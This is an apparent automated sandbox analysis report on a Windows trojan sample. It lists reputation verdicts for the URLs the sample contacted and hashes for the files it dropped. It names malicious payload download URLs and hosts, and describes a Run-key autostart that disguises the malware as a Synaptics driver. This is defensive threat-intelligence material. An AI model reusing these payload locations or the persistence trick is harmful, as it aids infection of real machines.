                                https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe |
                                https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe |
                                https://ncus.contentsync. | 0% | URL Reputation | safe |
                                https://apis.live.net/v5.0/ | 0% | URL Reputation | safe |
                                http://xred.site50.net/syn/SSLLibrary.dll | 100% | Avira URL Cloud | malware |
                                https://wus2.contentsync. | 0% | URL Reputation | safe |
                                http://xred.site50.net/syn/Synaptics.rarZ | 0% | Avira URL Cloud | safe |
                                https://asgsmsproxyapi.azurewebsites.net/ | 0% | URL Reputation | safe |
                                http://2.58.149.33/ominz_QLUnxlrvVz46.bin | 0% | Avira URL Cloud | safe |
                                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                freedns.afraid.org | 69.42.215.252 | true | false | | high
                                docs.google.com | 172.217.168.14 | true | false | | high
                                xred.mooo.com | unknown | unknown | false | | high
                                Name | Malicious | Antivirus Detection | Reputation
                                http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 | false | | high
                                http://2.58.149.33/ominz_QLUnxlrvVz46.bin | true | Avira URL Cloud: safe | unknown
                                                                                                              https://graph.windows.net76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                high
                                                                                                                https://dataservice.o365filtering.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://officesetup.getmicrosoftkey.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://analysis.windows.net/powerbi/api76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                  high
                                                                                                                  https://prod-global-autodetect.acompli.net/autodetect76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://outlook.office365.com/autodiscover/autodiscover.json76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                    high
                                                                                                                    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1RCXDA77.tmp.9.drfalse
                                                                                                                      high
                                                                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                        high
                                                                                                                        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                          high
                                                                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                            high
                                                                                                                            https://ncus.contentsync.76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                              high
                                                                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                high
                                                                                                                                http://weather.service.msn.com/data.aspx76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                  high
                                                                                                                                  https://apis.live.net/v5.0/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                    high
                                                                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                      high
                                                                                                                                      http://xred.site50.net/syn/SSLLibrary.dllRCXDA77.tmp.9.drtrue
                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                      unknown
                                                                                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                        high
                                                                                                                                        https://management.azure.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                          high
                                                                                                                                          https://outlook.office365.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                            high
                                                                                                                                            https://wus2.contentsync.76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://incidents.diagnostics.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                              high
                                                                                                                                              https://clients.config.office.net/user/v1.0/ios76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                high
                                                                                                                                                https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlluniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://insertmedia.bing.office.net/odc/insertmedia76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://o365auditrealtimeingestion.manage.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://outlook.office365.com/api/v1.0/me/Activities76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://api.office.net76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://incidents.diagnosticssdf.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://asgsmsproxyapi.azurewebsites.net/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://clients.config.office.net/user/v1.0/android/policies76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://entitlement.diagnostics.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://substrate.office.com/search/api/v2/init76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://outlook.office.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://storage.live.com/clientlogs/uploadlocation76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://outlook.office365.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://webshell.suite.office.com76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://substrate.office.com/search/api/v1/SearchHistory76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://management.azure.com/76A735AA-7941-42FC-A093-50DC74F5224B.13.drfalse
                                                                                                                                                                                  high
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 172.217.168.14 | docs.google.com | United States | 15169 | GOOGLEUS | false |
| 69.42.215.252 | freedns.afraid.org | United States | 17048 | AWKNET-LLCUS | false |
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 634939
Start date and time: 2022-05-27 04:36:30 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 39s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: SecuriteInfo.com.Variant.FakeAlert.2.24488.8627 (renamed file extension from 8627 to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 33
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@21/60@6/2
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 99.4% (good quality ratio 97.1%)
• Quality average: 82.8%
• Quality standard deviation: 25%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 210
• Number of non-executed functions: 292
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.109.88.177, 52.109.12.24, 52.109.12.23, 13.89.179.12
• Excluded domains from analysis (whitelisted): fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, arc.msn.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, europe.configsvc1.live.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
Time      Type             Description
04:37:46  API Interceptor  58x Sleep call for process: powershell.exe modified
04:37:50  API Interceptor  1x Sleep call for process: ._cache_uniformerede.exe modified
04:37:53  Autostart        Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
04:38:12  API Interceptor  78x Sleep call for process: Synaptics.exe modified
04:38:47  API Interceptor  1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  https://www.evernote.com/shard/s670/sh/55910dd8-9887-4018-3dce-75c372206cc5/1536ce86c6cb14e023f30a8fc3201040Get hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  kyTwt6MpdH.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  https://www.extcovdoc125.org/Get hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  https://bacguidelines.com/Get hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  SecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  https://urlsand.esvalabs.com/?u=https%3A%2F%2Fexpress.adobe.com%2Fpage%2FfeoM5782aYABf%2F&e=d02f10fa&h=34edaf6a&f=y&p=yGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  DOC.003242628829.DOC.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  Invoice_payment_confirmation_567.htmlGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  http://updates.password-update.com/76aaf4998a4ea5a3?l=13Get hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  https://www.ftaviation.com.co/gen/geo.htm#jacques.federspiel@hopitauxschuman.luGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                  Endermanch@7ev3n.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 172.217.168.14
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                                          Entropy (8bit):1.1219130372828425
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:iQdUUyxVpsQmFHNVj8DzJDzqjut6aLAltU/u7suS274ItdKDzy:BX4yHNVj8JqjJc/u7suX4Itoy
                                                                                                                                                                                                                          MD5:003F3B5C61F927CD9B787EFC85CFD128
                                                                                                                                                                                                                          SHA1:AFACE7575FBA9BE51D3A0EF7798E5E0CEAC71ADF
                                                                                                                                                                                                                          SHA-256:CA2610FD60A185204D451E31D3A08CDC179FF690028244A0AB351012A3A8F2A6
                                                                                                                                                                                                                          SHA-512:EC770C5CF91DCF291FD6CE7CC68706B6FA65E742C38A30C40C6365A36C62DF6CACB69F6803591ADA0E43553F3E4710BD51597CBA9158968658FF349D871221F3
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Fri May 27 11:38:39 2022, 0x1205a4 type
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1808260
                                                                                                                                                                                                                          Entropy (8bit):2.0410087371425427
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:j/o7nWuYmkgEWOal8CjyCRz6v792U+0NPCv78dQA2A80yYC18gB174gZ+A2EN6z2:s7W1+EOqA2EszEjkgdvq0Izo
                                                                                                                                                                                                                          MD5:AE218CDBEA668F0A4ECA0E0CEEADF10D
                                                                                                                                                                                                                          SHA1:734CE669A774BF48825A22E9BD1DCC39B8A925D9
                                                                                                                                                                                                                          SHA-256:690770416AE3260176AD1AE53068D1482BD614DD03F3BF268D0918ACDF924B1D
                                                                                                                                                                                                                          SHA-512:6FAC3C611C885FEAA0E326DBF80C92099B7F9500BBDAF301E334287B065374B4210661B832A6A46F0D559E4FAA40869242F73D60AB0565CB4DB47B46C5BAC2B5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):6304
                                                                                                                                                                                                                          Entropy (8bit):3.7160926141417865
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:Rrl7r3GLNiFxgo6YRpzYiSySZCprj89bzfsfZZRm:RrlsNiko6YbYaS1zEfc
                                                                                                                                                                                                                          MD5:163948AFB76DB7C6562534638BF5F9F3
                                                                                                                                                                                                                          SHA1:D28346E8ED8F5DDE8D1A67B95EC925AF83116547
                                                                                                                                                                                                                          SHA-256:BA59DDBA3876E93D552AAAC43848866ABA08049FA9A7D1A336237026B638B078
                                                                                                                                                                                                                          SHA-512:484F5C7D2E1633CF1E6B3296550E06DCC42D62FE4A9AF3C0571E85FCC80B1F2F488F6CA91C1A9C30510B63B72403078CD600FE6C66DF3FA01B973BF1EFF1C594
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):4556
                                                                                                                                                                                                                          Entropy (8bit):4.44053755078757
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:cvIwSD8zsJJgtWI9TLWgc8sqYjz8fm8M4JFcF4s+q84GTm+ZVd:uITfbA6grsqYMJFs86+ZVd
                                                                                                                                                                                                                          MD5:30A47CA659D2F001C9D41BAA4A8369C7
                                                                                                                                                                                                                          SHA1:F29BCB524E226E1606A450E2E2B9366EBA51A2BB
                                                                                                                                                                                                                          SHA-256:887F5C49A39A5318BC5D9DBA9CF65F6E886DC80FDC261D0BC3575F2828B796EA
                                                                                                                                                                                                                          SHA-512:8016E1E6650692DB901F352DD22B10117B2ED8DA22DCB544F7CC80DCEE59B121E1E3A43E9C79DC111DD63B5C25D758F5E2F64148333F165E4F1D30E0134C5C90
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\uniformerede.exe
                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):771584
                                                                                                                                                                                                                          Entropy (8bit):6.644060003425038
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I4r:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                                                                                                                                                          MD5:2A1D1C20CCA885322254DD2A22F51097
                                                                                                                                                                                                                          SHA1:B1E3866401ECA22981F985C17CB4CD9C36F85486
                                                                                                                                                                                                                          SHA-256:2B88A30E06873F61842038EC6C0E51B954DB482CD4641E33F01B3E80AF9F168D
                                                                                                                                                                                                                          SHA-512:ED72F56294BDF292A6EB1953CD657842CCFA2DCF3C5E69F24A1B11E19E5D8BD73DA5AAFB5F171CE91DBB07776CF8C2BF9028035E152E2CC8311A3CD21E51A886
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXCD96.tmp, Author: Joe Security
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\uniformerede.exe
                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1270272
                                                                                                                                                                                                                          Entropy (8bit):7.2217362129262685
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24576:TnsJ39LyjbJkQFMhmC+6GD9pYhK8VbNIf8gV2D:TnsHyjtk2MYC5GDwhKzy
                                                                                                                                                                                                                          MD5:FEDAD1ADEC8A1D90444051B5BDC6445D
                                                                                                                                                                                                                          SHA1:41AD10EE96250D8186D02E3D96923163CB664247
                                                                                                                                                                                                                          SHA-256:8B0667EC191E96C251FCE90FD0DEECCC09F1024F78FAF78B9FF32DED8B7CBB3D
                                                                                                                                                                                                                          SHA-512:303A40AC70E1E0BEDC08B55F5A0750A29F7E6EBCB55406293DD0F939D816CADC7FD0F6B604D607FD7478EB851A3648B1E5456CA51C971E494DA680FA44F5A8FE
                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                          File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):147717
                                                                                                                                                                                                                          Entropy (8bit):5.3591948483694365
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:gcQW/gxgB5B3guw//Q9DQW+zQWk4F77nXmvidQXxUETLKz6e:SHQ9DQW+zIXLI
                                                                                                                                                                                                                          MD5:B6DC8D4E2DFF6941F586C5A9B70A2113
                                                                                                                                                                                                                          SHA1:921C12EDEBDF9568A219D466BE57A60B52F1CE39
                                                                                                                                                                                                                          SHA-256:7D4B72B2F6CB7F91F5B77DCEF0C9361B3F10AE6E6DF4FF4195DE0DFDA205B733
                                                                                                                                                                                                                          SHA-512:535D53BA0D44D6306C5C26386A15F3ACF3B9AD4CEE7BCF095C85F086C95DE84997A268B353D89B53B25CCF6EA415ECD48F26D2F7B53E6E6FFE35F3AF083FF764
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-05-27T02:38:11">.. Build: 16.0.15322.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):22204
                                                                                                                                                                                                                          Entropy (8bit):5.600843010610084
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:FtMjDPC0cpuZQuKr+pu5SYZ2jilJHVptQcvrg3MrBInYM05KfFRV7SJ3dK5ZQvnH:kguehpgmlJH/KW6waDiOp2O+H
                                                                                                                                                                                                                          MD5:9DC3A55F3E37D2EF2B4AEECA7114D94D
                                                                                                                                                                                                                          SHA1:B3F041B7C6B144EECEA599808D9CD54FE2B626BE
                                                                                                                                                                                                                          SHA-256:BE415E1129D4EBAF6A3E5DBF038CBBAC04CFD0DA620DA74467E2C316CC0FE27A
                                                                                                                                                                                                                          SHA-512:811712D2A4EEABABC78BE22C6842CA55673322E54695A7EECD6EC31CFF944B57495FC21D83FE8ABDD62271032574B1E33785F1B5E6120306DFF26AE4C1945EEB
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.263193514344487
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+z+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:B5C49CC9E8DC5BB7979D44D737899DB3
                                                                                                                                                                                                                          SHA1:1CB0774BDC9C65E0A64F7FA8D823794C9D8A9161
                                                                                                                                                                                                                          SHA-256:D2FE0124264D63EA2EB3FF79940B41F1985012D54E84F3570C15EE9A1EB1EB48
                                                                                                                                                                                                                          SHA-512:6841EAED08CDD4C4BE9CC21046B1C2D93AFF0B7A34FE60A8361221B9144693E0EEA3B0A5830BCEBE6E8A333CCF515846643D590AF7B263CAC2F298D98234999F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UnOTan-iGx4fSwR8KWVDbQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.254010098815258
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0xySU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Ky+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:4309ACA8FE965CECD1BE6514FFECE3B4
                                                                                                                                                                                                                          SHA1:7D3CB895EA60DF7EABC9F6782A550855CAA46B85
                                                                                                                                                                                                                          SHA-256:1333C16A831C61707FB22D3D5C0C5538697F404F5D48873946721B260A66963F
                                                                                                                                                                                                                          SHA-512:CAFC30C2070FA594DA4F88627A7AC9AA9B1CEC5C8BE24A42DCBF92B8B1F0E78A2DCE8CCBF402F1510A4EC446A7A683D7D84A0775DCFF29B6020473C424F5B0A2
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.266160886679918
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0lWDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+ym+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:B7701E37A612013DF67A0990CE2D81BC
                                                                                                                                                                                                                          SHA1:0814185B4905AEBCE392297D16D0CFCBC864E140
                                                                                                                                                                                                                          SHA-256:CE9010DF0F130D27BAE288151624008B28320FCC19690062AF3F7431538F7F73
                                                                                                                                                                                                                          SHA-512:3CAD5A2527F1C0F0AFABADDA57CA4BB39B3E4E956D0151D478DCC49FBE5FEA96FD74F383BE10E47DA7F45E34F607BF2964CF9CE4E1C970FE5949695A90AEA083
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.262537312649583
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0ZySU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+b+pAZewRDK4mW
                                                                                                                                                                                                                          MD5:12084AEDF546294AFA8CB823217F89A1
                                                                                                                                                                                                                          SHA1:38F8AFC0D5FD9F242496295C97B53F353D171DDD
                                                                                                                                                                                                                          SHA-256:A6CF48D32BC467AA5B5A963653525AFF89DF1540289870BA462D4D9B8C46F169
                                                                                                                                                                                                                          SHA-512:C60DCCA7B8973A399442115C678B6E87BAFC0A5DED5C67566D92488DC3B94A95F1B470A189D9B86BC1B9BBD9758F3DBCA9EE5F24F181A8ADC143C5319FE30B2D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1642
                                                                                                                                                                                                                          Entropy (8bit):5.260631526490981
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:bsF+0TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+w+pAZewRDK4mW
